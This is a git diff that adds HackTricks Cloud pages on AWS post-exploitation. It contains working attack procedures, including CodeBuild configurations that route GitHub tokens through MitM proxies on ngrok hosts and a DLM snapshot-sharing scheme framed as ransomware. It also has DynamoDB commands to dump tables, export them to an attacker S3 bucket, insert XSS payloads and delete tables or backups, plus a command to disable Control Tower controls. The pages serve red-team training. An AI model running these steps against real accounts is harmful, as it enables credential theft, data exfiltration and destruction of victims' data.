diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
new file mode 100644
index 0000000000..804ee23047
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -0,0 +1,216 @@
+# AWS Codebuild - Token Leakage
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Recover Github/Bitbucket Configured Tokens
+
+First, check if there are any source credentials configured that you could leak:
+
+```bash
+aws codebuild list-source-credentials
+```
+
+### Via Docker Image
+
+If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+
+For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+
+The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+
+1. **Create & Upload your own Docker MitM image**
+   * Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
+     * **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
+   * You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
+   * Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
+2. **Set the environment**
+   * Create a **new Codebuild project** or **modify** the environment of an existing one.
+   * Set the project to use the **previously generated Docker image**
+
+<figure><img src="../../../../.gitbook/assets/image (23).png" alt=""><figcaption></figcaption></figure>
+
+3. **Set the MitM proxy in your host**
+
+* As indicated in the **Github repo** you could use something like:
+
+```bash
+mitmproxy --listen-port 4444  --allow-hosts "github.com"
+```
+
+{% hint style="success" %}
+The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+{% endhint %}
+
+4. **Run the build & capture the credentials**
+
+*   You can see the token in the **Authorization** header:
+
+    <figure><img src="../../../../.gitbook/assets/image (273).png" alt=""><figcaption></figcaption></figure>
+
+This could also be done from the aws cli with something like
+
+{% code overflow="wrap" %}
+```bash
+# Create project using a Github connection
+aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
+
+## With /tmp/buildspec.json
+{
+    "name": "my-demo-project",
+    "source": {
+        "type": "GITHUB",
+        "location": "https://github.com/uname/repo",
+        "buildspec": "buildspec.yml"
+    },
+    "artifacts": {
+        "type": "NO_ARTIFACTS"
+    },
+    "environment": {
+        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+        "image": "docker.io/carlospolop/docker-mitm:v12",
+        "computeType": "BUILD_GENERAL1_SMALL",
+        "imagePullCredentialsType": "CODEBUILD"
+    }
+}
+
+## Json
+
+# Start the build
+aws codebuild start-build --project-name my-project2
+```
+{% endcode %}
+
+### Via insecureSSL
+
+**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
+Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
+
+* First you need to enumerate the current configuration with something like:
+
+```bash
+aws codebuild batch-get-projects --name <proj-name>
+```
+
+* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
+  * Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like:
+
+{% code overflow="wrap" %}
+```bash
+aws codebuild update-project --name <proj-name> \
+    --source '{
+        "type": "GITHUB",
+        "location": "https://github.com/carlospolop/404checker",
+        "gitCloneDepth": 1,
+        "gitSubmodulesConfig": {
+            "fetchSubmodules": false
+        },
+        "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
+        "auth": {
+            "type": "CODECONNECTIONS",
+            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+        },
+        "reportBuildStatus": false,
+        "insecureSsl": true
+    }' \
+    --environment '{
+        "type": "LINUX_CONTAINER",
+        "image": "aws/codebuild/standard:5.0",
+        "computeType": "BUILD_GENERAL1_SMALL",
+        "environmentVariables": [
+            {
+                "name": "http_proxy",
+                "value": "http://2.tcp.eu.ngrok.io:15027"
+            },
+            {
+                "name": "https_proxy",
+                "value": "http://2.tcp.eu.ngrok.io:15027"
+            }
+        ]
+    }'
+```
+{% endcode %}
+
+* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
+
+```python
+from mitm import MITM, protocol, middleware, crypto
+
+mitm = MITM(
+    host="127.0.0.1",
+    port=4444,
+    protocols=[protocol.HTTP], 
+    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+    certificate_authority = crypto.CertificateAuthority()
+)
+mitm.run()
+```
+
+* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+
+<figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+
+### ~~Via HTTP protocol~~
+
+{% hint style="success" %}
+**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+{% endhint %}
+
+An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+
+* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+
+<figure><img src="../../../../.gitbook/assets/image (232).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../../../.gitbook/assets/image (213).png" alt=""><figcaption></figcaption></figure>
+
+* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
+* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
+
+```python
+from mitm import MITM, protocol, middleware, crypto
+
+mitm = MITM(
+    host="127.0.0.1",
+    port=4444,
+    protocols=[protocol.HTTP], 
+    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+    certificate_authority = crypto.CertificateAuthority()
+)
+mitm.run()
+```
+
+* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+
+<figure><img src="../../../../.gitbook/assets/image (159).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="warning" %}
+Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
new file mode 100644
index 0000000000..1fa4d4d499
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -0,0 +1,48 @@
+# AWS - Control Tower Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Control Tower
+
+{% content-ref url="../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md" %}
+[aws-control-tower-enum.md](../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
+{% endcontent-ref %}
+
+### Enable / Disable Controls
+
+To further exploit an account, you might need to disable/enable Control Tower controls:
+
+{% code overflow="wrap" %}
+```bash
+aws controltower disable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
+aws controltower enable-control --control-identifier <arn_control_id> --target-identifier <arn_account>
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
new file mode 100644
index 0000000000..0160899e90
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -0,0 +1,121 @@
+# AWS - DLM Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Data Lifecycle Manger (DLM)
+
+### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
+
+A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+
+Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+
+`aws ec2 describe-volumes`
+
+Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
+
+```bash
+aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
+```
+
+A template for the policy document can be seen here:
+
+```bash
+{
+  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+  "ResourceTypes": [
+    "VOLUME"
+  ],
+  "TargetTags": [
+    {
+      "Key": "ExampleKey",
+      "Value": "ExampleValue"
+    }
+  ],
+  "Schedules": [
+    {
+      "Name": "DailySnapshots",
+      "CopyTags": true,
+      "TagsToAdd": [
+        {
+          "Key": "SnapshotCreator",
+          "Value": "DLM"
+        }
+      ],
+      "VariableTags": [
+        {
+          "Key": "CostCenter",
+          "Value": "Finance"
+        }
+      ],
+      "CreateRule": {
+        "Interval": 24,
+        "IntervalUnit": "HOURS",
+        "Times": [
+          "03:00"
+        ]
+      },
+      "RetainRule": {
+        "Count": 14
+      },
+      "FastRestoreRule": {
+        "Count": 2,
+        "Interval": 12,
+        "IntervalUnit": "HOURS"
+      },
+      "CrossRegionCopyRules": [
+        {
+          "TargetRegion": "us-west-2",
+          "Encrypted": true,
+          "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+          "CopyTags": true,
+          "RetainRule": {
+            "Interval": 1,
+            "IntervalUnit": "DAYS"
+          }
+        }
+      ],
+      "ShareRules": [
+        {
+          "TargetAccounts": [
+            "123456789012"
+          ],
+          "UnshareInterval": 30,
+          "UnshareIntervalUnit": "DAYS"
+        }
+      ]
+    }
+  ],
+  "Parameters": {
+    "ExcludeBootVolume": false
+  }
+}
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
new file mode 100644
index 0000000000..a431beae51
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -0,0 +1,372 @@
+# AWS - DynamoDB Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## DynamoDB
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
+[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
+{% endcontent-ref %}
+
+### `dynamodb:BatchGetItem`
+
+An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+
+{% tabs %}
+{% tab title="json file" %}
+{% code overflow="wrap" %}
+```bash
+aws dynamodb batch-get-item --request-items file:///tmp/a.json
+
+// With a.json
+{
+    "ProductCatalog" : { // This is the table name
+        "Keys": [
+            {
+            "Id" : { // Primary keys name
+                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+            }
+            }
+        ]
+    }
+}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="inline" %}
+{% code overflow="wrap" %}
+```bash
+aws dynamodb batch-get-item \
+    --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+    --region <region>
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:GetItem`
+
+**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
+
+{% code overflow="wrap" %}
+```json
+aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json
+
+// With a.json
+{ 
+"Id" : { 
+    "N": "205"
+}
+}
+```
+{% endcode %}
+
+With this permission it's also possible to use the **`transact-get-items`** method like:
+
+```json
+aws dynamodb transact-get-items \
+    --transact-items file:///tmp/a.json
+
+// With a.json
+[
+    {
+        "Get": {
+            "Key": {
+                "Id": {"N": "205"}
+            },
+            "TableName": "ProductCatalog"
+        }
+    }
+]
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:Query`
+
+**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+
+{% tabs %}
+{% tab title="json file" %}
+{% code overflow="wrap" %}
+```bash
+aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
+ 
+ // With a.json
+ { 
+"Id" : { 
+    "ComparisonOperator":"EQ",
+    "AttributeValueList": [ {"N": "205"} ]
+    }
+}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="inline" %}
+```bash
+aws dynamodb query \
+    --table-name TargetTable \
+    --key-condition-expression "AttributeName = :value" \
+    --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+    --region <region>
+```
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:Scan`
+
+You can use this permission to **dump the entire table easily**.
+
+```bash
+aws dynamodb scan --table-name <t_name> #Get data inside the table
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:PartiQLSelect`
+
+You can use this permission to **dump the entire table easily**.
+
+```bash
+aws dynamodb execute-statement \
+    --statement "SELECT * FROM ProductCatalog"
+```
+
+This permission also allow to perform `batch-execute-statement` like:
+
+```bash
+aws dynamodb batch-execute-statement \
+    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+```
+
+but you need to specify the primary key with a value, so it isn't that useful.
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
+
+This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
+
+```bash
+aws dynamodb export-table-to-point-in-time \
+    --table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
+    --s3-bucket <attacker_s3_bucket> \
+    --s3-prefix <optional_prefix> \
+    --export-time <point_in_time> \
+    --region <region>
+```
+
+Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
+
+```bash
+aws dynamodb describe-continuous-backups \
+  --table-name <tablename>
+```
+
+If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
+
+```bash
+aws dynamodb update-continuous-backups \
+    --table-name <value> \
+    --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table
+
+### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
+
+With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
+
+```bash
+aws dynamodb restore-table-from-backup \
+    --backup-arn <source-backup-arn> \
+    --target-table-name <new-table-name> \
+    --region <region>
+```
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+
+### `dynamodb:PutItem`
+
+This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+
+{% tabs %}
+{% tab title="XSS Example" %}
+{% code overflow="wrap" %}
+```bash
+## Create new item with XSS payload
+aws dynamodb put-item --table <table_name> --item file://add.json
+### With add.json:
+{
+   "Id": {
+      "S": "1000"
+   },
+   "Name": {
+      "S":  "Marc"
+   },
+   "Description": {
+       "S": "<script>alert(1)</script>"
+   }
+}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="AI Example" %}
+```bash
+aws dynamodb put-item \
+    --table-name ExampleTable \
+    --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
+    --region <region>
+```
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+
+### `dynamodb:UpdateItem`
+
+This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
+
+{% tabs %}
+{% tab title="XSS Example" %}
+{% code overflow="wrap" %}
+```bash
+## Update item with XSS payload
+aws dynamodb update-item --table <table_name> \
+    --key file://key.json --update-expression "SET Description = :value" \
+    --expression-attribute-values file://val.json
+### With key.json:
+{
+    "Id": {
+        "S": "1000"
+    }
+}
+### and val.json
+{
+    ":value": {
+        "S": "<script>alert(1)</script>"
+    }
+}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="AI Example" %}
+```bash
+aws dynamodb update-item \
+    --table-name ExampleTable \
+    --key '{"Id": {"S": "1"}}' \
+    --update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
+    --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
+    --region <region>
+```
+{% endtab %}
+{% endtabs %}
+
+**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
+
+### `dynamodb:DeleteTable`
+
+An attacker with this permission can **delete a DynamoDB table, causing data loss**.
+
+```bash
+aws dynamodb delete-table \
+    --table-name TargetTable \
+    --region <region>
+```
+
+**Potential impact**: Data loss and disruption of services relying on the deleted table.
+
+### `dynamodb:DeleteBackup`
+
+An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
+
+```bash
+aws dynamodb delete-backup \
+    --backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
+    --region <region>
+```
+
+**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
+
+### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
+
+{% hint style="info" %}
+TODO: Test if this actually works
+{% endhint %}
+
+An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
+
+1. Enable a stream on a DynamoDB table:
+
+```bash
+bashCopy codeaws dynamodb update-table \
+    --table-name TargetTable \
+    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
+    --region <region>
+```
+
+2. Describe the stream to obtain the ARN and other details:
+
+```bash
+bashCopy codeaws dynamodb describe-stream \
+    --table-name TargetTable \
+    --region <region>
+```
+
+3. Get the shard iterator using the stream ARN:
+
+```bash
+bashCopy codeaws dynamodbstreams get-shard-iterator \
+    --stream-arn <stream_arn> \
+    --shard-id <shard_id> \
+    --shard-iterator-type LATEST \
+    --region <region>
+```
+
+4. Use the shard iterator to access and exfiltrate data from the stream:
+
+```bash
+bashCopy codeaws dynamodbstreams get-records \
+    --shard-iterator <shard_iterator> \
+    --region <region>
+```
+
+**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
new file mode 100644
index 0000000000..4000b19caf
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
@@ -0,0 +1,511 @@
+# AWS - EC2, EBS, SSM & VPC Post Exploitation
+
+{% hint style="success" %}
